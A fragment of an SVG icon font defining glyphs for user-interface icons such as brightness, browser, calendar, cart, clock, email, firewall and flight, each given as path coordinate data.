<glyph glyph-name="ui-brightness" horiz-adv-x="1000" unicode="&#xec43;" d="M198 351c0 167 136 304 303 303 167 0 303-137 303-304 0-166-136-302-302-302-170 0-305 134-304 303z m305 184v-370c106 1 186 87 183 196-3 94-92 180-183 174z m346-188c0 49 31 81 77 81 45-1 75-35 74-86 0-45-32-78-76-78-45 0-76 34-75 83z m-55-380c-43 0-78 34-78 76 1 43 41 84 84 84 42 0 77-35 77-77-1-42-41-82-83-83z m-289 883c47 0 80-31 81-76 0-43-34-74-78-76-55-2-85 39-85 76-1 44 34 76 82 76z m-221-193c0-43-42-84-84-84-42 0-77 36-76 78 0 42 43 83 84 82 42-1 76-35 76-76z m521-89c-43 1-83 41-82 84 0 42 35 76 78 75 43-1 82-42 82-85-1-42-35-75-78-74z m-603-594c-44 0-84 39-84 83 0 42 33 76 74 77 44 1 85-40 85-84 0-42-33-75-75-76z m212-47c1 43 35 76 80 76 47 0 83-33 83-77 0-43-35-76-81-76-48 0-82 32-82 77z m-261 428c-1-48-34-82-78-81-44 1-76 36-75 82 1 46 34 81 77 81 44-1 77-36 76-82z" />
<glyph glyph-name="ui-browser" horiz-adv-x="1000" unicode="&#xec44;" d="M448 850l38-4c74-9 140-36 198-81 83-64 134-148 153-251 10-54 8-108-5-162-2-6-4-9-11-10-8-1-17-5-27-8-5 4-13 8-20 14-2 2-3 6-3 9 10 36 14 72 11 108-2 23-8 45-12 67 0 2-4 6-6 6-27 0-55 0-84 0 2-14 3-28 4-42-10 4-20 8-30 10-10 2-20 1-31 1-1 8-3 16-3 24-1 5-3 8-9 8-32-1-64 0-97-1-3 0-7-3-8-5-9-14-19-24-33-32-2-2-5-6-5-8 0-48 0-95 0-143 4 0 7-1 11-1 24 0 49 0 73 1 8 0 10-3 10-10-1-14-1-28 0-41 0-9-3-11-11-11-23 1-47 1-70 1h-13c2-83-4-166 4-248-31-5-61-2-92 2-73 10-140 39-197 86-76 63-125 143-143 240-14 76-8 150 20 221 40 100 108 174 206 220 46 23 96 35 148 38 5 0 9 1 14 2h20z m-41-501c0 49 0 96 0 144 0 2-2 6-5 8-14 8-24 18-32 32-2 2-7 5-10 5-31 1-63 0-94 1-8 0-10-3-11-10-1-14-4-28-4-43-1-27 0-55 0-83 0-6 3-10 9-12 18-6 32-18 42-35 3-5 6-7 12-7 14 1 28 0 43 0 16 0 33 0 50 0z m-213 189c-28 0-55 0-83 0-2 0-6-4-6-7-16-58-16-116-1-174 1-6 4-8 10-8 14 0 28 0 42 0 6 0 8 2 12 7 5 8 11 15 18 22 5 4 6 8 5 14-1 25-2 49-1 73 0 24 3 48 4 73z m213-250c-33 0-65 0-97 0-2 0-5-3-7-6-6-6-11-14-17-20-4-4-5-8-3-13 7-15 14-31 21-46 19-35 43-66 77-87 8-5 16-8 26-12v184z m63 495c-1-2-2-3-2-4 0-45 0-89 1-134 0-3 3-7 6-9 13-7 23-18 31-31 2-3 6-5 10-6 26 0 53 0 80 0 2 0 5 1 8 1 0 2 0 3 0 4-3 9-6 19-9 28-17 45-39 86-74 120-15 13-31 25-51 31z m-63-1c-51-8-127-111-135-182 1 0 3-1 4-1 29 0 57 0 85 1 3 0 7 3 9 5 7 13 17 24 30 30 6 4 7 8 7 14 0 41 0 82 0 123v10z m336-183c-7 38-103 139-133 140 3-6 7-12 10-17 20-36 35-74 46-114 1-3 4-8 7-8 23-1 47-1 70-1z m-477 141l-3 1c-57-34-101-80-132-141 4 0 7-1 10-1 19 0 38 1 56 0 8 0 11 2 13 10 11 44 28 85 52 124 2 2 2 4 4 7z m-136-452c32-61 76-108 136-143-1 4-1 5-2 6-13 29-27 58-41 87-2 3-6 5-9 6-21 7-37 19-47 38-2 3-5 6-7 6-9 1-18 0-30 0z m105-1c18 0 32 13 32 31 0 19-14 33-33 33-17 0-31-14-31-31 0-19 13-33 32-33z m171 282c0-19 13-32 32-32 18 0 32 14 32 31 0 19-14 33-32 33-18 0-32-13-32-32z m210-719c-40 8-58 38-73 70-25 57-40 117-42 179 0 31 5 63 19 92 10 19 23 35 41 48 1-3 1-6 1-8l0-112c0-13 6-20 17-20 10 1 16 7 16 19 0 102 0 204 0 306 0 24 13 43 33 48 31 9 59-13 59-47 0-61 0-122 0-182 0-11 0-22 0-33 0-10 6-17 16-17 10 0 17 7 17 17 0 30 0 60 0 90 0 14 4 18 18 17 37-3 43-8 43-46 0-23 0-45 0-67 0-13 6-20 16-21 10 0 17 8 17 20v89c0 14 5 18 19 16 33-6 43-13 42-52-1-25 0-50 0-75 0-12 6-19 16-19 11 0 16 7 16 19 1 25 0 49 1 74 0 5 3 12 6 15 6 5 11 0 16-4 22-21 35-47 36-77 2-59 2-119 0-178-1-35-11-69-26-101-13-27-29-52-61-60l-263 0z" />
<glyph glyph-name="ui-calendar" horiz-adv-x="1000" unicode="&#xec45;" d="M930 676c0 50-28 75-78 74-17-1-20-7-20-22 1-25 1-51 0-76-2-41-26-66-67-69-21-2-43-2-64 0-43 3-68 29-69 73 0 24-1 48 0 72 1 16-4 22-20 22-75-1-150-1-225 0-17 0-20-8-19-22 0-25 0-51 0-76-1-38-23-64-61-68-23-3-47-3-70-1-43 2-66 27-68 70-1 25-1 51 0 76 1 16-5 20-21 21-51 1-78-25-78-77 0-248 0-497 0-746 0-53 23-77 77-77 235 0 471 0 706 0 54 0 77 23 77 77 0 124 0 249 0 373 0 126 0 251 0 376z m-762-177c0 13 6 18 19 18 55 0 110 0 164 0 12 0 17-5 17-16-1-45-1-90 0-135 0-14-8-16-20-16-27 0-54 0-81 0-27 0-54 0-81 0-13 0-18 5-18 18 0 44 0 87 0 131z m200-531c0-14-5-20-19-20-53 1-106 1-159 0-16 0-22 6-22 21 1 43 0 86 0 129 0 13 5 18 18 18 27-1 54 0 81 0 27 0 54-1 81 0 15 0 20-4 20-19-1-43-1-86 0-129z m-23 181c-26 1-52 0-78 0-25 0-51 1-76 0-16-1-24 4-23 21 1 42 1 85 0 127 0 16 6 20 22 20 52-1 104-1 157 0 18 1 21-7 21-23-1-41-1-82 0-123 1-18-6-23-23-22z m75 368c53 0 106 0 159 0 15 1 20-5 20-19 0-43-1-86 0-129 0-16-6-19-20-19-27 1-54 0-81 0-27 0-53 1-79 0-13 0-18 5-18 18 1 44 1 88 0 132 0 14 6 17 19 17z m-19-220c0 15 4 20 19 20 53-1 107-1 160 0 15 0 19-5 19-20 0-43 0-86 0-129 0-14-5-20-19-19-27 1-54 0-81 0-26 0-51 1-76 0-15-1-22 2-22 20 1 42 1 85 0 128z m198-326c1-17-6-23-22-23-52 1-103 1-155 0-15 0-22 5-21 21 1 42 1 84 0 126 0 16 5 22 21 21 26-1 52 0 78 0 26 0 51-1 76 0 16 1 24-4 23-22-1-41-1-82 0-123z m33 527c0 14 5 20 19 19 54 0 107 0 160 0 15 1 22-4 22-20-1-43-1-86 0-129 0-13-5-18-19-18-28 0-56 0-84 0-25 0-50 1-75 0-16-1-24 4-23 22 1 42 1 84 0 126z m200-532c1-13-6-18-18-18-55 1-110 1-165 0-12 0-17 6-17 17 0 45 0 90 0 135 0 15 9 16 20 16 27 0 54 0 81 0 27 0 54-1 81 0 13 0 19-5 18-18 0-44 0-88 0-132z m-23 183c-26 1-52 0-78 0-27 0-54 1-81 0-13 0-18 5-18 18 0 44 1 88 0 131 0 16 6 19 20 19 53 0 106 0 159 0 16 0 22-5 22-21-1-42-1-84 0-125 0-19-8-23-24-22z m-537 468c34 2 60 29 62 64 1 18 0 36 0 53 0 17 1 34 0 51-2 35-27 62-61 65-34 2-64-21-69-56-5-40-5-81 0-120 4-36 35-59 68-57z m458 0c37-2 66 27 69 67 1 16 0 31 0 47h0c0 18 1 36-1 54-2 38-31 65-67 65-35-1-64-29-65-67-1-33-1-66 0-98 1-39 28-67 64-68z" />
<glyph glyph-name="ui-call" horiz-adv-x="1000" unicode="&#xec46;" d="M664-149c-39-1-90 32-125 62-91 78-153 179-210 283-67 118-128 240-163 372-14 56-23 113-8 170 12 44 37 74 84 83 45 7 89 19 133 27 29 6 46-3 57-30 29-70 57-139 84-209 11-28 5-46-19-62-22-15-45-28-66-45-8-6-15-20-13-28 23-92 66-173 128-245 9-11 19-14 33-7 23 11 47 20 71 30 29 11 48 6 65-19 41-61 82-122 122-183 19-29 17-48-9-73-32-31-38-42-164-126z" />
<glyph glyph-name="ui-camera" horiz-adv-x="1000" unicode="&#xec47;" d="M501-25c-130 0-259 0-389 0-66 0-112 46-112 111 0 157 0 314 0 470 0 69 46 115 114 115 258 0 516 0 773 0 68 0 113-46 113-113 0-158 0-316 0-474 0-64-46-109-110-109-130 0-259 0-389 0z m-197 572c-28 0-55 1-83 0-56-1-102-36-105-91-4-93-2-186 1-280 1-32 42-71 76-73 52-4 104-4 156-4 23 1 36 25 28 49-4 13-10 25-14 38-28 107-11 206 56 296 10 14 17 28 9 44-9 18-25 22-43 21-27 0-54 0-81 0z m616-269c1 128-103 234-229 235-133 0-238-103-238-233-1-128 105-235 233-235 128 0 234 106 234 233z m-235 250c24 0 47 0 70 0 21 0 33 13 34 34 1 7 1 14 0 21-1 20-14 34-34 34-46 1-91 1-137 0-20 0-33-14-34-34-1-7 0-14 0-21 1-21 13-34 34-34 22 0 45 0 67 0z m-372 167h-169c3 20 14 29 31 30 37 1 73 1 110 0 17-1 26-10 28-30z m374-252c90-1 164-75 163-165-2-88-66-160-161-162-96-2-165 71-166 164-1 89 75 163 164 163z m119-165c0 66-52 120-118 121-66 1-120-53-121-119 0-67 53-120 118-121 67 0 120 52 121 119z m-74 65c30-20 41-48 34-83-6-29-31-55-60-61-34-6-64 5-84 34 38-21 73-21 102 9 30 29 29 64 8 101z m-60-29c-8-6-15-15-24-17-13-1-21 8-21 22 1 12 9 21 21 19 9-2 16-11 24-16l0-8z" />
<glyph glyph-name="ui-cart" horiz-adv-x="1000" unicode="&#xec48;" d="M417 176c-37 0-67-30-67-67 0-37 30-67 67-67 37 0 67 30 67 67 0 37-30 67-67 67z m350 0c-37 0-67-30-67-67 0-37 30-67 67-67s67 30 67 67c0 37-30 67-67 67z m217 403h-732l-50 79h-166c-20 0-36-16-36-36v-13c0-20 16-36 36-36h108c-2-4-2-9 2-15l188-314c7-12 24-22 38-22h445c13 0 29 10 35 23l146 312c6 12-1 22-14 22z m-248-86c0 14 11 25 25 25h10c13 0 25-11 25-25v-5c0-14-12-25-25-25h-10c-14 0-25 11-25 25v5z m-91 0c0 14 12 25 25 25h10c14 0 25-11 25-25v-5c0-14-11-25-25-25h-10c-13 0-25 11-25 25v5z m-91 0c0 14 12 25 25 25h10c14 0 25-11 25-25v-5c0-14-11-25-25-25h-10c-13 0-25 11-25 25v5z m-90 0c0 14 11 25 25 25h9c14 0 25-11 25-25v-5c0-14-11-25-25-25h-9c-14 0-25 11-25 25v5z m-91 0c0 14 11 25 25 25h9c14 0 25-11 25-25v-5c0-14-11-25-25-25h-9c-14 0-25 11-25 25v5z m-66-30c-14 0-25 11-25 25v5c0 14 11 25 25 25h9c14 0 25-11 25-25v-5c0-14-11-25-25-25h-9z m55-88h-9c-14 0-25 11-25 25v5c0 14 11 25 25 25h9c14 0 25-11 25-25v-5c0-14-11-25-25-25z m70-67c0-14-11-25-25-25h-9c-14 0-25 11-25 25v5c0 14 11 25 25 25h9c14 0 25-11 25-25v-5z m12 67c-14 0-25 11-25 25v5c0 14 11 25 25 25h9c14 0 25-11 25-25v-5c0-14-11-25-25-25h-9z m79-67c0-14-11-25-25-25h-9c-14 0-25 11-25 25v5c0 14 11 25 25 25h9c14 0 25-11 25-25v-5z m12 67c-14 0-25 11-25 25v5c0 14 11 25 25 25h9c14 0 25-11 25-25v-5c0-14-11-25-25-25h-9z m79-67c0-14-11-25-25-25h-10c-13 0-25 11-25 25v5c0 14 12 25 25 25h10c14 0 25-11 25-25v-5z m12 67c-14 0-25 11-25 25v5c0 14 11 25 25 25h9c14 0 25-11 25-25v-5c0-14-11-25-25-25h-9z m79-67c0-14-11-25-25-25h-10c-13 0-25 11-25 25v5c0 14 12 25 25 25h10c14 0 25-11 25-25v-5z m11 67c-13 0-25 11-25 25v5c0 14 12 25 25 25h10c14 0 25-11 25-25v-5c0-14-11-25-25-25h-10z m80-67c0-14-12-25-25-25h-10c-14 0-25 11-25 25v5c0 14 11 25 25 25h10c13 0 25-11 25-25v-5z m46 92c0-14-12-25-25-25h-10c-14 0-25 11-25 25v5c0 14 11 25 25 25h10c13 0 25-11 25-25v-5z m44 88c0-14-11-25-24-25h-10c-14 0-25 11-25 25v5c0 14 11 25 25 25h10c13 0 24-11 24-25v-5z" />
<glyph glyph-name="ui-cell-phone" horiz-adv-x="1000" unicode="&#xec49;" d="M712 850h-54c-21 0-39-17-39-39v-57h-293c-42 0-77-35-77-78v-749c0-42 35-77 77-77h348c42 0 77 35 77 77v884c0 22-17 39-39 39z m-303-918h-92v92h92v-92z m0 137h-92v92h92v-92z m136-137h-92v92h92v-92z m0 137h-92v92h92v-92z m136-137h-91v92h91v-92z m0 137h-91v92h91v-92z m15 190c0-21-18-38-39-38h-313c-22 0-39 17-39 38v365c0 21 17 38 39 38h313c21 0 39-17 39-38v-365z" />
<glyph glyph-name="ui-chat" horiz-adv-x="1000" unicode="&#xec4a;" d="M335 309c6 70 63 128 142 154 27 9 54 26 74 46 62 66 194 76 273 17-31 38-76 67-130 85-32 10-64 30-87 53-103 106-361 88-395-92-99-15-187-51-208-160-22-115 51-178 160-224-30-73-59-142-89-213 86 12 164 49 231 108 16 13 39 29 57 27 33-4 66-4 98-2-8 6-17 11-25 17-67 47-108 100-101 184z m612-338c-21 50-41 100-63 152 77 33 129 78 113 161-15 78-77 104-146 115-24 129-207 142-279 66-16-17-39-31-61-38-67-22-115-71-120-130-6-70 29-115 85-154 82-58 169-87 268-76 13 1 29-10 40-19 48-43 102-69 163-77z" />
<glyph glyph-name="ui-check" horiz-adv-x="1000" unicode="&#xec4b;" d="M986 675l-154 124c-16 13-40 10-53-6l-419-519-164 149c-15 14-39 13-53-2l-133-146c-14-16-13-40 2-54l351-319c16-14 39-12 52 4l124 154c0 1 0 1 0 1l453 561c13 16 10 40-6 53z" />
<glyph glyph-name="ui-clip-board" horiz-adv-x="1000" unicode="&#xec4c;" d="M881 724c-9 5-18 8-27 8-38 1-77 1-115 1-1 0-2-1-4-1v-60c0-29 0-57 0-86 0-19-10-29-29-29-80 0-160 0-240 0-56 0-111 0-167 0-24 0-34 9-34 33 0 45 0 89 0 134 0 3 0 5 0 9h-55c-20 0-40 0-60 0-34-1-61-27-61-61 0-256 0-511 0-766 0-30 24-54 54-55 4-1 8-1 12-1 229 0 458 1 687 0 34 0 58 12 69 45v787c-6 17-13 34-30 42z m-157-380c-70-70-140-141-211-212-14-14-29-29-43-44-15-15-29-14-44 0-49 47-98 94-147 140-17 17-18 31-2 48 10 9 19 19 29 28 15 16 28 16 44 1l93-86c1-1 3-2 4-3 32 32 64 63 95 94 36 35 71 71 107 107 16 17 30 17 46 0 10-10 19-19 28-29 15-14 15-29 1-44z m-378 272c9-2 19-1 28-1 89-1 179-1 268 0 3 0 7 0 10 0 16 3 24 13 25 28 0 30 0 60 0 90-1 29-15 50-38 56-9 2-18 2-27 2-17 1-35 1-52 1-1 5-1 8-2 12-1 23-9 41-34 46h-48c-32-7-34-33-35-58h-56c-36 0-60-23-61-59-1-30-1-61 0-91 0-14 8-24 22-26z" />
<glyph glyph-name="ui-clip" horiz-adv-x="1000" unicode="&#xec4d;" d="M742 804c15-3 30-5 45-9 118-34 190-112 209-234 15-91-14-172-79-238-113-114-227-227-340-340-15-14-33-15-46-2-13 13-12 32 2 46 111 112 223 223 334 335 118 117 70 314-86 364-85 27-160 7-224-56-145-142-289-286-434-429-23-22-43-46-53-77-22-68 5-142 65-180 60-38 138-32 190 18 46 44 90 89 135 133 108 106 215 213 323 319 52 52 32 136-37 158-34 11-66 3-92-22-54-53-107-106-160-159-60-61-121-122-182-183-10-10-21-14-34-9-12 4-19 12-21 25-2 12 4 21 12 30 53 52 105 105 158 157 60 60 119 121 180 180 44 44 97 58 156 41 59-18 96-58 108-118 12-54-3-102-41-141-153-152-306-304-461-455-63-61-140-76-222-48-81 28-129 88-144 172-1 5 0 9-3 13v43c1 1 2 3 2 4 6 54 30 98 69 135 47 47 95 94 142 141 103 102 207 204 310 306 34 33 74 56 119 69 17 5 36 7 53 11h47z" />
<glyph glyph-name="ui-clock" horiz-adv-x="1000" unicode="&#xec4e;" d="M500 850c-276 0-500-224-500-500 0-276 224-500 500-500 276 0 500 224 500 500 0 276-224 500-500 500z m-3-830c-182 0-330 148-330 330s148 330 330 330c183 0 331-148 331-330s-148-330-331-330z m75 376v174c0 32-26 59-58 59h-28c-32 0-58-27-58-59v-210c0-22 12-41 30-51 1-2 2-5 5-7l149-149c22-23 59-23 82 0l19 19c23 23 23 60 0 82l-141 142z" />
<glyph glyph-name="ui-close" horiz-adv-x="1000" unicode="&#xec4f;" d="M981 104l-246 246 246 246c26 26 25 68 0 94l-141 141c-26 25-68 25-94 0l-246-247-246 247c-26 25-68 25-94 0l-141-141c-25-26-25-68 0-94l247-246-247-246c-25-26-25-68 0-94l141-141c26-25 68-25 94 0l246 247 246-247c26-25 68-25 94 0l141 141c26 26 26 68 0 94z" />
<glyph glyph-name="ui-contact-list" horiz-adv-x="1000" unicode="&#xec50;" d="M785-147c26 28 51 54 76 81 48 54 42 114-15 156-47 35-93 69-141 101-54 36-103 23-136-32-13-21-24-43-35-64-105 52-201 151-256 254 23 13 46 25 68 38 52 33 64 80 31 131-36 56-76 109-116 163-15 20-38 29-75 31 0 26-3 52 1 77 5 36 36 61 73 61 209 0 417 0 626 0 46 0 77-35 77-85 0-107 0-213 0-320v-476c0-13 1-27 0-40-3-50-33-79-83-79-30 0-60 0-90 0-1 0-2 1-5 3z m-183 441c62 0 124 0 185 0 14 0 29 2 28 19-1 15-16 19-30 18-10 0-20-2-30-2-50 1-100 2-150 2-62 0-124 0-186 0-12 0-26-1-27-18-1-17 12-19 25-19 62 0 124 0 185 0z m41 344l147 0c12 0 24 3 24 18 0 16-13 18-26 18l-289 0c-14 0-26-2-25-19 0-16 12-17 25-17 48 0 96 0 144 0z m-2-163c49-1 98 0 147-1 13 0 26 3 26 19 0 16-14 18-27 18l-288 0c-13 0-25-2-25-18-1-16 11-19 25-19 47 1 95 1 142 1z m15-622c-62 6-123 30-180 64-155 93-280 217-373 372-30 49-53 102-63 160-9 55 1 105 46 144 23 19 44 41 67 60 32 27 62 24 87-10 34-46 67-92 99-140 25-37 19-62-21-85-21-12-42-21-64-32-26-13-32-28-15-52 28-40 56-80 88-117 52-62 113-114 183-157 35-21 45-18 63 19 9 19 18 38 29 56 22 39 46 46 83 20 47-31 92-65 138-98 7-5 13-11 18-19 15-22 16-45-2-65-25-30-52-58-79-86-27-27-62-33-104-34z m-472 264c99-108 204-199 335-265-8-1-13-2-17-2-78 0-156 0-234 0-52 0-84 32-84 83v184z" />
<glyph glyph-name="ui-copy" horiz-adv-x="1000" unicode="&#xec51;" d="M750 434c0-93 0-186 0-279 0-67-42-120-107-135-9-1-18-3-27-3-132 0-265 0-397 0-66 0-119 43-132 107-2 10-3 20-3 30 0 151 0 302 0 453-1 24 8 45 21 64 36 52 83 93 134 129 29 20 58 38 92 47 8 2 16 3 24 3 87 0 174 0 261 0 75 0 133-60 134-134 0-94 0-188 0-282z m-601 184c0-4 0-6 0-9 0-154 0-308 0-463 0-34 31-64 65-64 135 0 269 0 404 0 4 0 9 0 13 2 33 7 53 34 53 68v566c0 37-29 67-66 67-86 0-172 0-258 0-3 0-7-1-11-1 0-5 0-10 0-14-1-25 0-50-2-75-3-37-25-64-60-72-13-3-26-5-40-5-32 0-64 0-98 0z m102-636c20 0 39 0 59 0 2 0 5-4 6-6 3-35 35-62 73-61 131 1 262 0 393 0 34 0 60 21 68 53 1 5 1 9 1 14 0 190 0 380 0 570 0 33-24 61-57 65-8 1-10 4-9 11 0 18 0 36 0 54 25 0 47-6 67-18 42-26 64-65 64-114 1-189 1-378 0-567 0-79-61-128-117-131-46-2-92-2-139-2-91 0-183 0-275 0-49 1-87 22-114 64-13 20-19 42-20 68z m165 519c-59 0-118 0-177 0-14 0-20 5-22 25 0 16 7 24 22 24 118 0 235-1 352 0 10 0 18-1 22-11 4-11 5-23-3-32-4-4-11-6-16-6-60 0-119 0-178 0z m0-100h-177c-15 0-22 7-21 24 0 17 6 25 21 25 118-1 236-1 354-1 15 0 23-7 23-23 0-17-7-25-24-25-58 0-117 0-176 0z m0-52h177c16 0 24-7 23-24-1-17-6-24-24-24-118 0-236 0-354 0-13 0-17 4-20 19-4 18 5 29 24 29 58 0 116 0 174 0z m-1-148c-58 0-116 0-174-1-18 0-23 7-23 27 0 17 6 22 24 22h352c14 0 22-8 22-24 0-15-7-24-22-24-59 0-119 0-179 0z" />
<glyph glyph-name="ui-cut" horiz-adv-x="1000" unicode="&#xec52;" d="M811 286c-51 0-98-20-132-54l-82 118 214 307c30 43 25 98-10 122-35 25-88 10-118-33l-181-260-181 260c-30 43-83 58-118 33-35-24-39-79-10-122l214-307-84-120c-34 35-82 56-134 56-104 0-189-84-189-188s85-189 189-189c12 0 23 1 35 3 33-9 73 7 97 42l181 260 142-204c8-14 16-26 26-38l13-18c24-34 63-50 96-42 11-2 21-3 32-3 104 0 189 84 189 189s-85 188-189 188z m-622-277c-49 0-89 40-89 89s40 88 89 88 89-39 89-88c0-49-40-89-89-89z m311 262c-33 0-59 26-59 59 0 33 26 60 59 60 33 0 60-27 60-60 0-33-27-59-60-59z m311-262c-49 0-88 40-88 89s39 88 88 88 89-39 89-88c0-49-40-89-89-89z" />
<glyph glyph-name="ui-delete" horiz-adv-x="1000" unicode="&#xec53;" d="M800 573c-98 0-195 0-292 0-103 0-206 1-309 0-52-1-64-14-57-65 27-198 55-396 84-594 7-53 20-64 74-64 138 0 276 0 415 0 59 0 72 15 79 73 23 190 47 381 71 570 9 66 0 79-65 80z m-454-618c-33-5-46 22-49 51-17 137-32 274-48 411-3 27 5 50 33 55 32 5 47-17 50-45 11-81 20-162 30-243 7-56 13-112 19-168 3-29-1-57-35-61z m201 51c0-28-12-53-42-52-33 0-42 26-42 56 1 68 0 136 0 203h-1c0 68 1 135 0 203 0 29 5 57 39 59 35 1 45-26 45-55 1-138 1-276 1-414z m217 407c-17-137-34-274-52-410-3-28-18-52-48-47-33 4-39 31-34 61 9 67 16 134 25 201s17 134 25 201c4 29 12 56 47 54 34-3 40-31 37-60z m-339 351c16 83 25 92 81 83 96-15 99-18 86-111 74-13 148-27 223-39 32-5 61-13 56-53-6-42-41-37-70-32-172 29-344 59-516 89-37 6-75 14-112 19-30 5-48 20-43 51 6 32 30 39 58 34 79-14 158-28 237-41z" />
<glyph glyph-name="ui-dial-phone" horiz-adv-x="1000" unicode="&#xec54;" d="M1000 635c0 35-68 81-152 95-230 38-464 38-694 0-85-14-153-60-153-95 0-1 1-2 1-3-1-3-2-7-2-11v-118c0-16 14-30 31-30h154c17 0 31 14 31 30v108c188 25 380 25 568 0v-115c0-17 14-30 31-30h154c17 0 31 13 31 30v123c0 3-1 6-2 9 1 2 2 4 2 7z m-79-362l-169 57c-13 4-31 8-49 12v187h-71v-110h-262v110h-72v-188c-16-4-31-7-43-11l-165-56c-32-11-58-48-58-82v-189c0-34 27-61 61-61h825c34 0 61 27 61 61v189c0 34-26 71-58 81z m-425-263c-92 0-166 75-166 167 0 92 74 167 166 167 93 0 167-75 167-167 0-92-74-167-167-167z m0 256c-49 0-89-40-89-89 0-49 40-89 89-89 50 0 90 40 90 89 0 49-40 89-90 89z" />
<glyph glyph-name="ui-edit" horiz-adv-x="1000" unicode="&#xec55;" d="M0-110c28 95 56 190 83 286 3 7 5 15 7 23 3 11 9 20 18 28 9 7 16 16 24 24 131 129 261 258 391 387 3 3 6 6 8 9 18-18 34-34 53-53-2-1-6-3-9-6-135-135-270-270-405-405-5-5-9-11-11-18-16-54-31-107-47-161-2-7-1-11 4-16 8-7 16-16 24-23 3-3 8-5 12-4 54 16 107 31 161 48 5 1 9 5 12 9 137 136 274 273 411 410 2 2 5 5 6 7 19-20 38-38 59-59-1-1-5-2-7-5-135-133-270-266-404-401-19-18-39-30-64-37-89-25-178-52-267-78-5-2-11-3-17-5h-8c-5 2-9 4-13 6-12 5-16 17-21 28v6z m269 165c-3 17-5 32-7 47-1 8-4 10-11 12-17 3-34 7-50 11 142 142 284 284 425 425 22-22 46-45 68-68-140-141-282-283-425-427z m408 731c13 12 26 26 40 38 39 36 90 35 128-3 43-41 84-83 126-125 39-40 38-93-1-133-12-12-24-24-35-35-85 86-171 171-258 258z m-104-94c19 18 39 36 58 54 90-89 179-179 269-268-19-18-39-37-58-55l-269 269z" />
<glyph glyph-name="ui-email" horiz-adv-x="1000" unicode="&#xec56;" d="M953 372c-3-78-27-146-71-204s-110-86-197-86c-29 0-54 8-75 24-21 17-36 40-45 69-15-30-33-53-55-68-23-15-49-23-79-23-53 0-94 21-122 64s-39 98-31 168c9 90 35 162 78 216 43 54 96 81 157 81 43 0 78-4 105-14 26-9 55-23 86-43l-1-2h2l-27-304c-2-31 0-52 6-64 6-11 14-17 24-17 40 0 72 19 96 58 25 38 38 87 41 145 6 122-18 216-71 284-54 68-136 102-247 102-109 0-194-37-258-110s-98-172-104-298c-6-123 20-220 78-291 58-71 141-107 249-107 30 0 61 3 93 10 33 6 61 15 84 25l21-89c-24-15-55-27-92-35-37-9-73-13-108-13-145 0-256 44-334 134-78 89-114 211-108 366 6 153 52 275 138 365s200 135 343 135c140 0 247-43 321-128 74-85 108-202 103-350z m-542-56c-4-42-1-75 9-97s25-33 46-33c20 0 37 5 52 16 15 11 29 31 40 60l22 242c-8 2-16 4-23 5-8 1-15 2-23 2-37 0-66-16-85-49s-32-81-38-146z" />
<glyph glyph-name="ui-file" horiz-adv-x="1000" unicode="&#xec57;" d="M900 596v-1l-229 229h0l-25 25h-12c-5 1-9 1-14 0h-423c-68 0-124-55-124-124v-751c0-68 56-124 124-124h607c68 0 124 56 124 124v594l-28 28z m-76-554c0-45-37-83-82-83h-483c-45 0-83 38-83 83v615c0 46 38 83 83 83h228v-149h-192c-22 0-41-19-41-41v-38c0-23 19-42 41-42h198c7-12 20-21 35-21h297l-1-407z m-199 497c-21 0-39 18-39 39v207c0 5 2 9 3 13 2-6 5-12 10-17l241-242h-215z m80-320h-410c-22 0-41-19-41-42v-37c0-23 19-42 41-42h410c23 0 42 19 42 42v37c0 23-19 42-42 42z m-451 144v-37c0-23 19-42 41-42h410c23 0 42 19 42 42v37c0 23-19 42-42 42h-410c-22 0-41-19-41-42z" />
<glyph glyph-name="ui-fire-wall" horiz-adv-x="1000" unicode="&#xec58;" d="M520 850c21-20 40-38 61-54 85-70 181-113 290-127 30-3 60-5 90-5 10 0 13-3 11-12-14-71-32-141-53-210-3-8-6-11-15-11-124 0-249 0-373 0-8 0-12 0-12 10 0 134 0 268 0 402 0 1 1 3 1 7z m-41-1c3-5 2-9 2-13 0-130 0-260 0-390 0-12-2-15-15-15-123 0-246 0-369 0-10 0-14 3-18 13-20 67-38 134-50 203-2 15-2 15 13 16 31 3 63 4 95 8 110 14 208 57 292 131 17 15 33 31 50 47z m0-999c-21 19-43 37-63 56-138 130-237 286-308 461-10 26-10 26 18 26 114 0 228 0 342 0 10 0 13-2 13-13 0-172 0-345 0-518 0-4 1-7-2-12z m40 1v14c0 171 0 343 0 514 0 11 2 14 14 14 119 0 237 0 356 0 9 0 11-1 8-11-79-208-204-384-373-528-1 0-2-1-5-3z" />
<glyph glyph-name="ui-flash-light" horiz-adv-x="1000" unicode="&#xec59;" d="M765 425c-5-24 5-44 25-64 27-27 77-50 53-96-26-47-68-87-129-93-40-4-75 7-104 36-84 83-169 164-250 249-73 77-44 197 54 241 24 11 41 0 56-17 35-39 72-62 131-65 100-6 164-89 164-191z m-583-572c-59-1-148 65-172 128-23 59-6 110 39 154 84 83 168 166 250 251 20 21 32 22 53-1 59-62 120-122 182-182 18-17 20-28 1-47-89-86-176-175-264-262-26-27-58-38-89-41z m141 246c38 1 68 34 67 73-2 39-32 66-73 65-36-2-66-33-65-69 1-37 34-70 71-69z m628 458c27 1 40-12 46-33 8-24 0-44-23-52-34-12-70-21-105-28-25-5-40 12-46 35-5 21 0 41 22 49 36 12 73 20 106 29z m-241 240c-9-32-17-67-30-101-10-25-33-24-55-18-23 6-32 23-27 45 7 32 14 65 25 97 7 23 26 32 51 25 23-6 36-19 36-48z m85-205c-26 1-39 12-49 28-11 18-4 33 8 46 21 22 42 44 64 64 20 19 41 18 60-1 19-18 24-41 4-60-29-28-51-64-87-77z" />
<glyph glyph-name="ui-flight" horiz-adv-x="1000" unicode="&#xec5a;" d="M302 178h-62c-3 1-5 2-8 2-40 5-80 10-120 16-11 2-22 6-33 8l1 4c98 34 197 68 297 103-49 58-97 116-145 173 12 13 24 26 35 38h6c3-1 5-3 8-4 106-43 212-85 318-127 4-2 11-2 15 0 84 27 169 55 252 83 28 10 56 19 86 15 18-3 36-5 48-22v-15c-16-33-43-55-76-68-17-7-35-12-53-18-170-56-340-112-510-168-20-6-39-13-59-20z m-128 81c-25-9-49-17-73-26-3-1-6-2-9-3-21-7-21-7-35 10-19 22-38 44-56 66-1 0-1 0-1 2 8 7 16 14 24 22 1 1 5 1 6 0 48-22 95-45 142-69 1 0 1-1 2-2z" />
